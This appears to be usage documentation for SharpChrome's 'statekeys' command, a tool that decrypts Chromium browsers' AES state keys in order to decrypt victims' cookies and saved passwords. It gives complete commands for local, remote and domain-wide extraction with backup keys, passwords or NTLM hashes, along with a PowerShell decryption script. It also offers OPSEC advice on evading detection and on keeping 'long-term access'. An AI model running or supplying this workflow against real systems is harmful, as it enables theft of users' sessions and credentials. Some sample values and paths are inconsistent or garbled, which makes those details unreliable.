Overview The statekeys command locates and decrypts AES state keys used by Chrome 80+ and other Chromium-based browsers to encrypt cookies and login data. Starting with Chrome version 80, Google moved from direct DPAPI encryption to a two-layer approach where an AES state key (protected by DPAPI) is used to encrypt credentials.
This command searches for Chromium-based application state key files (stored in Local State JSON files), decrypts the DPAPI-protected state keys, and outputs them in a format that can be used with the cookies and logins commands for credential decryption.
Key Features
Automatically discovers state keys for multiple browsers
Supports Chrome, Edge, Brave, and Slack
Decrypts DPAPI-protected AES state keys
Outputs keys for use with cookies/logins commands
Handles both local and remote extraction
Processes all users when elevated
Basic Usage Unprivileged Context
With Domain DPAPI Backup Key
With Masterkeys
With User Credentials
Targeted Extraction
# Decrypt state keys for current user SharpChrome.exe statekeys # Use CryptUnprotectData explicitly SharpChrome.exe statekeys /unprotect
Command Arguments Decryption
Targeting
Output
Decryption Arguments Force use of CryptUnprotectData() for decryption. Default behavior in unprivileged contexts. Must run from the user context that owns the state keys.
Use a DPAPI domain backup key to first decrypt user masterkeys, then decrypt state keys. Accepts two formats:
Base64-encoded key: /pvk:HvG1sAAAAAABAAAAAAAAAAAAAAACU...
File path: /pvk:key.pvk
Requires domain admin rights to obtain via the backupkey command. One or more DPAPI masterkey GUID:SHA1 mappings for decryption. SharpChrome.exe statekeys {44ca9f3a-9097-455e-94d0-d91de951c097}:9b049ce6918ab... {feef7b25-51d6-4e14-a52f-eb2a387cd0f3}:f9bc09dad3bc2cd...
Extract these with Mimikatz: sekurlsa::dpapi File containing one or more GUID:SHA1 masterkey mappings (one per line). SharpChrome.exe statekeys /mkfile:masterkeys.txt
Decrypt target user’s masterkeys using plaintext password. Works remotely. SharpChrome.exe statekeys /password:Password123!
Decrypt target user’s masterkeys using NTLM hash. Works remotely. SharpChrome.exe statekeys /ntlm:8846F7EAEE8FB117AD06BDD830B7586C
Decrypt target user’s masterkeys using DPAPI prekey (domain or local SHA1).
Domain users: Use dpapi field from Mimikatz sekurlsa::msv
Local users: Use sha1 field from Mimikatz sekurlsa::msv
Decrypt target user’s masterkeys by asking the domain controller via RPC.
Targeting Arguments Specify a specific Local State file or user directory to target. File targeting (specific Local State file): SharpChrome.exe statekeys /target:"C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State"
Directory targeting (user folder): SharpChrome.exe statekeys /target:C: \U sers \t argetuser \
When targeting a user directory, SharpChrome searches for all browser state files in that user’s profile. Triage a remote server. Must be combined with /pvk or /password. SharpChrome.exe statekeys /server:WORKSTATION01 /pvk:key.pvk
Requires administrative access to the remote system. Default Behavior By default (no /target specified), the statekeys command searches for all supported Chromium-based applications:
Google Chrome
Microsoft Edge (Chromium)
Brave Browser
Slack Desktop
State key file locations:
Chrome : %LOCALAPPDATA%\Google\Chrome\User Data\Local StateEdge : %LOCALAPPDATA%\Microsoft\Edge\User Data\Local StateBrave : %LOCALAPPDATA%\BraveSoftware\Brave-Browser\User Data\Local StateSlack : %APPDATA%\Slack\Local State Output Options The statekeys command outputs decrypted AES state keys in hexadecimal format: [*] Chrome State Key: 3F7A8B2C9D1E4F6A8B2C9D1E4F6A8B2C9D1E4F6A8B2C9D1E4F6A8B2C [*] Edge State Key: A1B2C3D4E5F6A7B8C9D0E1F2A3B4C5D6E7F8A9B0C1D2E3F4A5B6C7D8
These keys can then be used with the /statekey parameter in cookies and logins commands. Privilege Context Unprivileged Context:
Processes only current user’s state keys
Uses CryptUnprotectData() automatically
No admin rights required
Elevated Context:
Processes ALL users’ state keys
Can use any decryption method
Requires local administrator privileges
Chrome 80+ State Key Architecture Why State Keys Exist Starting with Chrome 80 (released February 2020), Google introduced a new security architecture for credential storage to improve cross-platform compatibility and security.
Architecture Overview
State Key Generation
Chrome generates a random AES-256 key when first launched.
DPAPI Protection
The AES state key is encrypted using Windows DPAPI and stored in the Local State JSON file.
Credential Encryption
New cookies and login credentials are encrypted using the AES state key instead of direct DPAPI encryption.
Decryption Process
To decrypt credentials:
Read encrypted state key from Local State file
Decrypt state key using DPAPI
Use decrypted state key to decrypt cookies/logins
The state key is stored in the Local State JSON file under the os_crypt.encrypted_key field:
{ "os_crypt" : { "encrypted_key" : "RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX60EAAAAqtB+W..." } }
The encrypted key format:
Header : “DPAPI” (5 bytes)DPAPI Blob : Encrypted AES key
Supported Browsers All Chromium-based browsers version 80+ use this architecture:
Google Chrome Version : 80+ (February 2020 and later)State File : %LOCALAPPDATA%\Google\Chrome\User Data\Local StateDefault target for statekeys command.
Microsoft Edge Version : All Chromium-based versionsState File : %LOCALAPPDATA%\Microsoft\Edge\User Data\Local StateEdge adopted Chromium’s encryption from the start.
Brave Browser Version : All versionsState File : %LOCALAPPDATA%\BraveSoftware\Brave-Browser\User Data\Local StateUses same encryption as Chrome.
Slack Desktop Version : Recent versionsState File : %APPDATA%\Slack\Local StateSlack’s Electron app uses Chromium engine.
Example Workflows Extract state keys from the local system:
# Extract for current user (unprivileged) SharpChrome.exe statekeys # Extract for all users (elevated, with backup key) SharpChrome.exe statekeys /pvk:backup.pvk
Example Output: [*] Action: Chrome State Key Extraction [*] Searching for Chrome Local State files... [*] User: DESKTOP\user Chrome State Key (AES-256): 3F7A8B2C9D1E4F6A8B2C9D1E4F6A8B2C9D1E4F6A8B2C9D1E4F6A8B2C Edge State Key (AES-256): A1B2C3D4E5F6A7B8C9D0E1F2A3B4C5D6E7F8A9B0C1D2E3F4A5B6C7D8 Brave State Key (AES-256): 9E8D7C6B5A4F3E2D1C0B9A8F7E6D5C4B3A2F1E0D9C8B7A6F5E4D3C2B
Scenario 2: Use State Keys for Cookie Decryption Extract state keys and use them to decrypt cookies:
# Step 1: Extract state keys SharpChrome.exe statekeys /pvk:backup.pvk # Output shows: # Chrome State Key: 3F7A8B2C9D1E4F6A8B2C9D1E4F6A8B2C9D1E4F6A8B2C9D1E4F6A8B2C # Step 2: Use state key to decrypt cookies SharpChrome.exe cookies /statekey:3F7A8B2C9D1E4F6A8B2C9D1E4F6A8B2C9D1E4F6A8B2C9D1E4F6A8B2C /format:json /url:".*office\.com.*" # Step 3: Use state key to decrypt logins SharpChrome.exe logins /statekey:3F7A8B2C9D1E4F6A8B2C9D1E4F6A8B2C9D1E4F6A8B2C9D1E4F6A8B2C
Scenario 3: Domain-Wide State Key Extraction As domain admin, extract state keys from all domain workstations:
# Step 1: Get domain backup key SharpChrome.exe backupkey /server:DC01.domain.com /file:backup.pvk # Step 2: Extract local state keys SharpChrome.exe statekeys /pvk:backup.pvk # Step 3: Extract from remote workstations SharpChrome.exe statekeys /server:WORKSTATION01 /pvk:backup.pvk SharpChrome.exe statekeys /server:WORKSTATION02 /pvk:backup.pvk SharpChrome.exe statekeys /server:WORKSTATION03 /pvk:backup.pvk
Extract state keys from specific users or browsers:
# Target specific user directory SharpChrome.exe statekeys /target:C: \U sers \t argetuser \ /pvk:backup.pvk # Target specific Local State file SharpChrome.exe statekeys /target:"C:\Users\admin\AppData\Local\Google\Chrome\User Data\Local State" /pvk:backup.pvk
Full workflow for Chrome 80+ credential extraction:
# Step 1: Extract state keys (save output) SharpChrome.exe statekeys /pvk:backup.pvk > statekeys.txt # Parse state keys from output # Chrome State Key: 3F7A8B2C9D1E4F6A8B2C9D1E4F6A8B2C9D1E4F6A8B2C9D1E4F6A8B2C # Step 2: Extract cookies using state key SharpChrome.exe cookies /statekey:3F7A8B2C9D1E4F6A8B2C9D1E4F6A8B2C9D1E4F6A8B2C9D1E4F6A8B2C /format:json /url:".*" /setneverexpire /consoleoutfile:cookies.json # Step 3: Extract logins using state key SharpChrome.exe logins /statekey:3F7A8B2C9D1E4F6A8B2C9D1E4F6A8B2C9D1E4F6A8B2C9D1E4F6A8B2C /format:table /consoleoutfile:logins.txt
Extract state keys from remote systems using user credentials:
# Using plaintext password SharpChrome.exe statekeys /server:WORKSTATION04 /password:Password123! # Using NTLM hash SharpChrome.exe statekeys /server:WORKSTATION04 /ntlm:8846F7EAEE8FB117AD06BDD830B7586C # Using DPAPI prekey SharpChrome.exe statekeys /server:WORKSTATION04 /prekey:SHA1_PREKEY_HERE
Example Output __ _ (_ |_ _. ._ ._ / |_ ._ _ ._ _ _ __) | | (_| | |_) \_ | | | (_) | | | (/_ | v1.9.0 [*] Action: Chrome State Key Extraction [*] Triaging state keys for ALL users [*] User: DESKTOP\john [*] Found Chrome Local State: C:\Users\john\AppData\Local\Google\Chrome\User Data\Local State guidMasterKey : {44ca9f3a-9097-455e-94d0-d91de951c097} size : 152 flags : 0x0 algHash/algCrypt : 32772/26115 description : Chrome State Key Chrome State Key (AES-256): 3F7A8B2C9D1E4F6A8B2C9D1E4F6A8B2C9D1E4F6A8B2C9D1E4F6A8B2C [*] Found Edge Local State: C:\Users\john\AppData\Local\Microsoft\Edge\User Data\Local State guidMasterKey : {44ca9f3a-9097-455e-94d0-d91de951c097} size : 152 flags : 0x0 algHash/algCrypt : 32772/26115 description : Edge State Key Edge State Key (AES-256): A1B2C3D4E5F6A7B8C9D0E1F2A3B4C5D6E7F8A9B0C1D2E3F4A5B6C7D8 [*] User: DESKTOP\admin [*] Found Chrome Local State: C:\Users\admin\AppData\Local\Google\Chrome\User Data\Local State guidMasterKey : {feef7b25-51d6-4e14-a52f-eb2a387cd0f3} size : 152 flags : 0x0 algHash/algCrypt : 32772/26115 description : Chrome State Key Chrome State Key (AES-256): 9E8D7C6B5A4F3E2D1C0B9A8F7E6D5C4B3A2F1E0D9C8B7A6F5E4D3C2B [*] Found Brave Local State: C:\Users\admin\AppData\Local\BraveSoftware\Brave-Browser\User Data\Local State guidMasterKey : {feef7b25-51d6-4e14-a52f-eb2a387cd0f3} size : 152 flags : 0x0 algHash/algCrypt : 32772/26115 description : Brave State Key Brave State Key (AES-256): 7D6C5B4A3F2E1D0C9B8A7F6E5D4C3B2A1F0E9D8C7B6A5F4E3D2C1B0A [*] Completed state key extraction
If SharpChrome is unavailable, you can manually extract state keys using PowerShell and the DPAPI APIs.
Manual PowerShell Method # Read Local State file $localState = Get-Content " $ env: LOCALAPPDATA \Google\Chrome\User Data\Local State" | ConvertFrom-Json # Get encrypted key (base64 encoded) $encryptedKeyB64 = $localState .os_crypt.encrypted_key # Decode from base64 $encryptedKey = [ System.Convert ]::FromBase64String( $encryptedKeyB64 ) # Remove "DPAPI" header (first 5 bytes) $dpapiBlob = $encryptedKey [ 5 .. ( $encryptedKey .Length - 1 )] # Decrypt using DPAPI Add-Type - AssemblyName System.Security $decryptedKey = [ System.Security.Cryptography.ProtectedData ]::Unprotect( $dpapiBlob , $null , [ System.Security.Cryptography.DataProtectionScope ]::CurrentUser ) # Convert to hex string $stateKey = [ System.BitConverter ]::ToString( $decryptedKey ) -replace '-' , '' Write-Output "State Key: $stateKey "
Using Python with dpapick import json import base64 from dpapick import blob, masterkey # Read Local State with open ( r "C: \U sers \u ser \A ppData \L ocal \G oogle \C hrome \U ser Data \L ocal State" ) as f: local_state = json.load(f) # Get encrypted key encrypted_key_b64 = local_state[ 'os_crypt' ][ 'encrypted_key' ] encrypted_key = base64.b64decode(encrypted_key_b64) # Remove "DPAPI" header dpapi_blob = encrypted_key[ 5 :] # Decrypt DPAPI blob (requires masterkey) # ... (implementation depends on masterkey availability)
Detection Considerations EDR/AV Detection Vectors
File Access Patterns
Reading Local State JSON files from browser directories
Accessing multiple users’ browser profile directories
Parsing JSON configuration files
Process Behavior
SharpChrome.exe enumerating user profiles
DPAPI API calls for decryption
Accessing browser data directories
Network Activity
Remote file access to browser profile paths
SMB connections to multiple workstations
Domain controller communication for RPC decryption
API Monitoring
CryptUnprotectData calls
File system access to Local State files
JSON parsing operations
OPSEC Recommendations Defensive Detection Points:
State key extraction is less obvious than direct cookie/login extraction
Local State files are legitimate config files (less suspicious to read)
Multiple Local State file accesses in short time frame is suspicious
Remote extraction via SMB generates network logs
Consider extracting state keys separately from credential usage
Use state keys offline to avoid detection during credential extraction
Log Sources
Windows Event Logs : File access events, DPAPI operationsSysmon : File access to Local State files (Event ID 11)EDR Telemetry : Process creation, API calls, file operationsNetwork Logs : SMB traffic to ADMIN$ shares
SharpChrome Cookies Use state keys to decrypt browser cookies
SharpChrome Logins Use state keys to decrypt saved login credentials
Backup Key Retrieval Retrieve domain DPAPI backup key from DC
SharpChrome Overview Complete SharpChrome documentation
Tips and Troubleshooting Common Issues
Possible causes:
Browser version is older than Chrome 80
Browser never been launched (no Local State created)
Looking in wrong user profile
Browser using different encryption method
Solutions:
Verify Chrome/Edge version is 80+
Check that Local State file exists in browser directory
Ensure running as correct user or using proper decryption method
Try extracting cookies/logins directly without state key
State key decryption fails
Possible causes:
Wrong user context for CryptUnprotectData
Missing or incorrect masterkey
Corrupted Local State file
Solutions:
Run as the user who owns the state key
Use correct decryption method (/pvk, /password, masterkeys)
Verify Local State file is valid JSON
Try alternative decryption methods
State key doesn't work with cookies/logins
Possible causes:
State key extracted incorrectly (wrong format)
State key changed (user cleared browser data)
Credentials use different encryption
Solutions:
Re-extract state key
Verify state key is 64 hexadecimal characters
Check if cookies/logins are from before Chrome 80
Try automatic decryption without manual state key
Best Practices Operational Best Practices:
Extract Once, Use Many : State keys don’t change often, extract once and reuseOffline Decryption : Extract state keys remotely, decrypt credentials locallySave State Keys : Store extracted state keys for future useAutomate Collection : Script state key extraction across multiple systemsVerify Format : Ensure state keys are 64-character hex stringsTest First : Verify state key works before large-scale collection State Key Persistence State keys remain valid until:
User clears browser data (settings/cookies)
Browser is reinstalled
User profile is recreated
Windows reinstalled or profile migrated
State keys are remarkably persistent and can remain valid for months or years, making them valuable for long-term access.
Local extraction : Very fast, completes in secondsRemote extraction : Depends on network speedMulti-user systems : Scales linearly with user countMultiple browsers : Each browser has independent state key
Additional Resources 
